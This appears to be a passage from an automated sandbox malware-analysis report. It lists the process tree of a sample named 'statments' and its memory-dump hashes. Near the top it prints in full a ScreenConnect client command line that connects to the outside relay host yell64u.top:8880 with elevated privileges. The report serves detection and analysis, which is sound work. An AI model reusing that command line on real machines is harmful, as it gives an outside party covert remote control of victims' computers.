                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c="
                                                                                  Imagebase:0x5a0000
                                                                                  File size:95'520 bytes
                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:14:03:22
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User"
                                                                                  Imagebase:0x700000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:11
                                                                                  Start time:14:03:25
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System"
                                                                                  Imagebase:0x490000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ae253130c040f89352753015258d36d9393ef4a1636299bf3af986929053ab76
                                                                                    • Instruction ID: 3f334aa5423c254fd6417b15295c12a060909b6a24574d60c57a68727e1b5285
                                                                                    • Opcode Fuzzy Hash: ae253130c040f89352753015258d36d9393ef4a1636299bf3af986929053ab76
                                                                                    • Instruction Fuzzy Hash: 40A10634B00619CFDB14DFA8C594AADB7F2BF88610B1485A8E506AB364DB71ED41CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cf8612d03cee0113b8c743392064990a0f40fdd9aa934be3d340b5e13726c81
                                                                                    • Instruction ID: 4271945378d878ae3fd1a361df16ba52e55152545167fe5bbd00362e67f3dd59
                                                                                    • Opcode Fuzzy Hash: 6cf8612d03cee0113b8c743392064990a0f40fdd9aa934be3d340b5e13726c81
                                                                                    • Instruction Fuzzy Hash: 04910534B00619CFDB14DFA8D594AADBBF2BF89710B1485A8E506AB364DB70ED41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec9804c5755c59ccd90d536686048ef19c2dfa4c337863f7d9bd47ba4f6658e0
                                                                                    • Instruction ID: cc894e268dcf77cdc92387cf2a42728af449b99ca2caa2c68cf50cd10b5529da
                                                                                    • Opcode Fuzzy Hash: ec9804c5755c59ccd90d536686048ef19c2dfa4c337863f7d9bd47ba4f6658e0
                                                                                    • Instruction Fuzzy Hash: 16914874B002059FDB19EBA8D594A6DBBF2FF88704B148529E81ADB758DF70EC018B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 623746aa89c19efc4983c3c9aa178e6f36eb5dc610b430934c8b34aeff3884ed
                                                                                    • Instruction ID: 2aa9bda7e2fde140d04895bf42416cfd5baec301b11d3e75056cd08159816ecf
                                                                                    • Opcode Fuzzy Hash: 623746aa89c19efc4983c3c9aa178e6f36eb5dc610b430934c8b34aeff3884ed
                                                                                    • Instruction Fuzzy Hash: 0581AD75A006058FC704DF68C884F6EBBF2FF89321B1584AAE9499B351DB31EC41CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c31eaf5ff5bcb12ffeab826ba7a9224a23d30311fe591d9474b9d662c699d618
                                                                                    • Instruction ID: 01cd8b3ad2df3802b33f2133885d052d41306e6812d3fd2184a284a985682114
                                                                                    • Opcode Fuzzy Hash: c31eaf5ff5bcb12ffeab826ba7a9224a23d30311fe591d9474b9d662c699d618
                                                                                    • Instruction Fuzzy Hash: 4F914B30A003058FCB59EFA9D94459EBBF2FF89724B14C169E815AF349EB709906CF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6e6104c39b343dae550f5509223330ccfc242c9fd7e1cbe4612fa2dd17f95bf
                                                                                    • Instruction ID: 2c38320a17e645940102eac7b46f891b03df72a8ccf0175c573288886106ef8a
                                                                                    • Opcode Fuzzy Hash: a6e6104c39b343dae550f5509223330ccfc242c9fd7e1cbe4612fa2dd17f95bf
                                                                                    • Instruction Fuzzy Hash: 39818D74B002059FDB04DFA8C984EAEBBF2FF89710F158169E515AB3A5CB30AC01CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 45103159d3aa5485cd9925f4ce8946e048dc4a7df9667c322993e6d73662f202
                                                                                    • Instruction ID: 3b24c32dcc587721cbb0a26c139e34ec33d163e1079b673ef64a60fce7c1b389
                                                                                    • Opcode Fuzzy Hash: 45103159d3aa5485cd9925f4ce8946e048dc4a7df9667c322993e6d73662f202
                                                                                    • Instruction Fuzzy Hash: F6610231B00215CFDB29DF68985066EFBA7FFC8B20B20446AE646DB350DB31D842C7A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 75f67135e5e3972077f6900d854bc8625cf20b4966d6aba01b75a510c06c759e
                                                                                    • Instruction ID: 15befbea2591659ad85c5bc58fd3f811ce012eda1107666e500cabc04902d8c8
                                                                                    • Opcode Fuzzy Hash: 75f67135e5e3972077f6900d854bc8625cf20b4966d6aba01b75a510c06c759e
                                                                                    • Instruction Fuzzy Hash: AD813874B002059FDB19EFA9D594A6DBBF2FB88704B108529E81ADB758DF70EC018F81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 28f62761f630c77e3b3d63bd6551835d2f0c8a07b33fc09603446c0b0e6845ee
                                                                                    • Instruction ID: 448cd24211421cdf40713b2a529629ef2baa088baacae9cd3e06cce013a1df59
                                                                                    • Opcode Fuzzy Hash: 28f62761f630c77e3b3d63bd6551835d2f0c8a07b33fc09603446c0b0e6845ee
                                                                                    • Instruction Fuzzy Hash: 2671E030A106089FDB04DFB8E584BACBBF2FF89310F548169E505AB3A4DB31AD05CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f5ae421e5a23f33e961d1436ba811f74b62f553819f56cc7794a9573cff6a6f
                                                                                    • Instruction ID: dd80277b3beb8cfa1112afa8109ea71e1e00d4fb0282b419916be6de026711f1
                                                                                    • Opcode Fuzzy Hash: 6f5ae421e5a23f33e961d1436ba811f74b62f553819f56cc7794a9573cff6a6f
                                                                                    • Instruction Fuzzy Hash: 63715D74B002059FDB14DFA8C984EAEB7F6FF88720F158169E515AB3A5DB30AD01CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 08b96c25cb3934cf3b5dba66c224e2e8960abf3310bd1334a557b0f856072985
                                                                                    • Instruction ID: 8737f2f1120f8dc9adf7b65fed667eecdb3de503aec2d47a60070ae0c16ca43e
                                                                                    • Opcode Fuzzy Hash: 08b96c25cb3934cf3b5dba66c224e2e8960abf3310bd1334a557b0f856072985
                                                                                    • Instruction Fuzzy Hash: A4814C35600705EFCB64DF68C980A6EB7F2FF84300B458959EA469BA56D730F941CFA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a528deac5eb6167403b7a058d77703e2e954aa84dffed517a128082da2f1c403
                                                                                    • Instruction ID: 8f36463bc22cec8ff94900f61c6dc6214bdf5d41e30698410b8b3a6771250786
                                                                                    • Opcode Fuzzy Hash: a528deac5eb6167403b7a058d77703e2e954aa84dffed517a128082da2f1c403
                                                                                    • Instruction Fuzzy Hash: 88618C31B102058FCB08DF78D8905AEBBF6FF89220B198569E50AEB395DF30AD05CB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 249f79bada67dc77cbe988026f9a9d70f0e9b1a49a73b26ddea8a575d3431d4f
                                                                                    • Instruction ID: 5cd28c3a57642dc614bc86c933c23593dc5588ae7096ec9c6c51789d8f7190ec
                                                                                    • Opcode Fuzzy Hash: 249f79bada67dc77cbe988026f9a9d70f0e9b1a49a73b26ddea8a575d3431d4f
                                                                                    • Instruction Fuzzy Hash: 3261E938B106159FDB18DFA9D894AAEB7F2FF8D614B508164E506AB365DB30EC01CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d75047161d1a99d76fbe3b8f1fc0f907004b074d75ca23373e134b2d9365802e
                                                                                    • Instruction ID: 8ed9485f7859b8a4f14055c6ecb254be029bbdb7d9fc58e7c337745e44550195
                                                                                    • Opcode Fuzzy Hash: d75047161d1a99d76fbe3b8f1fc0f907004b074d75ca23373e134b2d9365802e
                                                                                    • Instruction Fuzzy Hash: 61511F30B00215DFEB289B65D868B7EBBE2FF84710F15892DE556DB294DB309C80CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32a32c24f9abcdf13000ce964834a30ffe00e8329dc6051ea639ebdaf4ba218c
                                                                                    • Instruction ID: 5559b2781cd4065a676fe1b5d7a5f06d642cae42548432456ab6574825a38c4a
                                                                                    • Opcode Fuzzy Hash: 32a32c24f9abcdf13000ce964834a30ffe00e8329dc6051ea639ebdaf4ba218c
                                                                                    • Instruction Fuzzy Hash: EF513D78B003058FDB14DFB9D894AAAB7F6FFC8610B148569E109DB325EB70EC018B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6c8a1062997cfc44d7ca585e24af77d507a84c14a4507cd9d65df448da159f7
                                                                                    • Instruction ID: 30d0ef976c31f157ad3130bfe2a8bc5cec4492f09c7c9d4f0b11d0a50176b8f3
                                                                                    • Opcode Fuzzy Hash: c6c8a1062997cfc44d7ca585e24af77d507a84c14a4507cd9d65df448da159f7
                                                                                    • Instruction Fuzzy Hash: 00514B78B003058FDB14DFA9D8949AAB7F6FFCC610B548569E50ADB325EB70EC018B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c6a47e5577433bf0159d2cb47c6ce0caf80b6faaf2fa1fb5856400a422b31ea
                                                                                    • Instruction ID: 9e9b0a904f273e1ea7f1289ae4aeebe9e80a8dbd64ecd795b93393f9c1ae9d98
                                                                                    • Opcode Fuzzy Hash: 4c6a47e5577433bf0159d2cb47c6ce0caf80b6faaf2fa1fb5856400a422b31ea
                                                                                    • Instruction Fuzzy Hash: 7E6100387106058FC754DF79D88499ABBF6FF89A14B1185A9E51ADB721EB30EC01CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19a3f475a4fa21d8fc21b3df4c5551772e67eef2e4666a856cb9460873b4b3f6
                                                                                    • Instruction ID: f7e0718dc9faaf1c0aa2c1076dd1d9c1bd30d12c44a5c25faf383a60884b2aa3
                                                                                    • Opcode Fuzzy Hash: 19a3f475a4fa21d8fc21b3df4c5551772e67eef2e4666a856cb9460873b4b3f6
                                                                                    • Instruction Fuzzy Hash: 86517E34A04204DFCB15DF68D8C4E6EBBF2FB88321B4584AAE5499B355D731EC42CBA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6c5d404a76600de1b962cd4fbe2d693cd0b640f026fd658c3178131a7364231
                                                                                    • Instruction ID: 6953fc210230fca69cd68f233ceb0b8f973d0a2b80a9650a8969ec4f6d094df7
                                                                                    • Opcode Fuzzy Hash: a6c5d404a76600de1b962cd4fbe2d693cd0b640f026fd658c3178131a7364231
                                                                                    • Instruction Fuzzy Hash: F1512C35A106158FCB04CFA9C88499EB7F6FF8A704B25816AE505EF361DB71AD05CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c8334359c35c38c32ebe098f6b53271254569cf9c36d56f348b82347c9c64f1b
                                                                                    • Instruction ID: 1dc5e789758267dc0b9b9979002d4fc7fed14051140c81109ac98debd6acf25c
                                                                                    • Opcode Fuzzy Hash: c8334359c35c38c32ebe098f6b53271254569cf9c36d56f348b82347c9c64f1b
                                                                                    • Instruction Fuzzy Hash: D4610E38710A048FC754DF69D88499ABBF6FF89A1071185A9E51ADB731EB30EC01CF80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4da72a316f0392aff7f079c87a68f1bc5b0afac41322e277a0aef74f1f684382
                                                                                    • Instruction ID: a2dd14542a5f17aaf2300316461e281db0938496cfda946a15fc09d21d1ad7f5
                                                                                    • Opcode Fuzzy Hash: 4da72a316f0392aff7f079c87a68f1bc5b0afac41322e277a0aef74f1f684382
                                                                                    • Instruction Fuzzy Hash: F251CD34B043099FDF09AFA9A4547AEBBE6EF89210F148469E905CB385DF30DD058BA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3be2f94b26d68922894581085348f39b26dac7b73e5dc2b8d7dc14803c293152
                                                                                    • Instruction ID: 150572b39444d6d9133ebd028ac80b291f2b2a1068436fb4fe8185d24d227e74
                                                                                    • Opcode Fuzzy Hash: 3be2f94b26d68922894581085348f39b26dac7b73e5dc2b8d7dc14803c293152
                                                                                    • Instruction Fuzzy Hash: 7451A674A007058FCB05DF78D890AAEFBF2FF89220B148569E955EB391DB31AD05CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ccf7a34c003bbb69e242e433fec198a789cca07c6f40df7cb21f393f257da5d1
                                                                                    • Instruction ID: d02401481129b702fcc5941161cbcc0dc1668616e76c2ee942b2d20c022bcb5b
                                                                                    • Opcode Fuzzy Hash: ccf7a34c003bbb69e242e433fec198a789cca07c6f40df7cb21f393f257da5d1
                                                                                    • Instruction Fuzzy Hash: 49516D75A007058FC760CFA9D585A6EF7F6FB88310B148A2AD99AD7B50E731F841CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 28b4e604c1f3e120942fcb6ba418e553a279109b8264b72fa432123ea805957b
                                                                                    • Instruction ID: 63fdf744b65abf18d22d3dba0ea3a9db6c50e6a849b763a85752b12ee5ca67ce
                                                                                    • Opcode Fuzzy Hash: 28b4e604c1f3e120942fcb6ba418e553a279109b8264b72fa432123ea805957b
                                                                                    • Instruction Fuzzy Hash: 91418C35B002019FDB19AB64C894B7EBBF2FFC8610F144069EA06DB396DA359C428B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 06a69ceb90d7397f8b1355f0fa3985ba710ea43cd23907b5f1e957658ebd6ec3
                                                                                    • Instruction ID: 213134f3cc819667eef05d4486b39dface0514b1aa8a2a3b487694b4722e88b2
                                                                                    • Opcode Fuzzy Hash: 06a69ceb90d7397f8b1355f0fa3985ba710ea43cd23907b5f1e957658ebd6ec3
                                                                                    • Instruction Fuzzy Hash: 71512D346006018FDB1CDF29D4D465AB7B1FF89725B4482A8E815DF3AADB30E852CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8e181915304ccac45510d929d04a31549f2f597df910c595b3a3bdd6cd98797e
                                                                                    • Instruction ID: 9312b7d7543043eaed425671cb1f0be722b741c7e878b049b36c793939bdc874
                                                                                    • Opcode Fuzzy Hash: 8e181915304ccac45510d929d04a31549f2f597df910c595b3a3bdd6cd98797e
                                                                                    • Instruction Fuzzy Hash: 9C516C39A20605EFCB05EF98E995C99BBB5FF88304B00DA55F9456B325DB30E981CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 723fcdb44d441f9015b1d4ac2f41131766df960e77929f4f70cc1ad83de7e2b1
                                                                                    • Instruction ID: eaa7b9c4c2a7eeddfd3cb62165f1fc607744dae51c187e0e32f2f88f78f86ad5
                                                                                    • Opcode Fuzzy Hash: 723fcdb44d441f9015b1d4ac2f41131766df960e77929f4f70cc1ad83de7e2b1
                                                                                    • Instruction Fuzzy Hash: C0415F75B0051A9FCB08CFA9C8949ADB7F2FFCC310B158168EA19A7364DB31AC51CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1565419475.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_55f0000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ac6194b8f246f4c91fed4ad439288d35016267ea16dcfc9f65410153da06eea
                                                                                    • Instruction ID: b6095cd4b04cf33c02df1580868c947ad29b436eaa7163b444d087a8da41b1f4
                                                                                    • Opcode Fuzzy Hash: 4ac6194b8f246f4c91fed4ad439288d35016267ea16dcfc9f65410153da06eea
                                                                                    • Instruction Fuzzy Hash: 683121665293A45FF703ABBCE9703CA7F60AF92569F0905A3C084CF1A2DA544809C7E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 00bb29c61b50a620b92a1257cfd08962a5f13772980fd79a40f2a90016f98d83
                                                                                    • Instruction ID: 8975e2d6e06098ac7dd62cdafd153c57e3aef683f8ddf2d6e4b3a814cadaa9b7
                                                                                    • Opcode Fuzzy Hash: 00bb29c61b50a620b92a1257cfd08962a5f13772980fd79a40f2a90016f98d83
                                                                                    • Instruction Fuzzy Hash: 0A41E678B04705DF9F08EB98E480A6A77FAEBCC214B648055E509DB395EB31ED018F61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1549184384.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_1180000_statments.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c521e49b4e6f133a1885a033de14a17d0b31809a130790e6f7f0ba44ac3568b
                                                                                    • Instruction ID: 7fdd1029301fc31f56f7b2a8445cb6b30fee88ce390d7dd2468b7ce089743a11
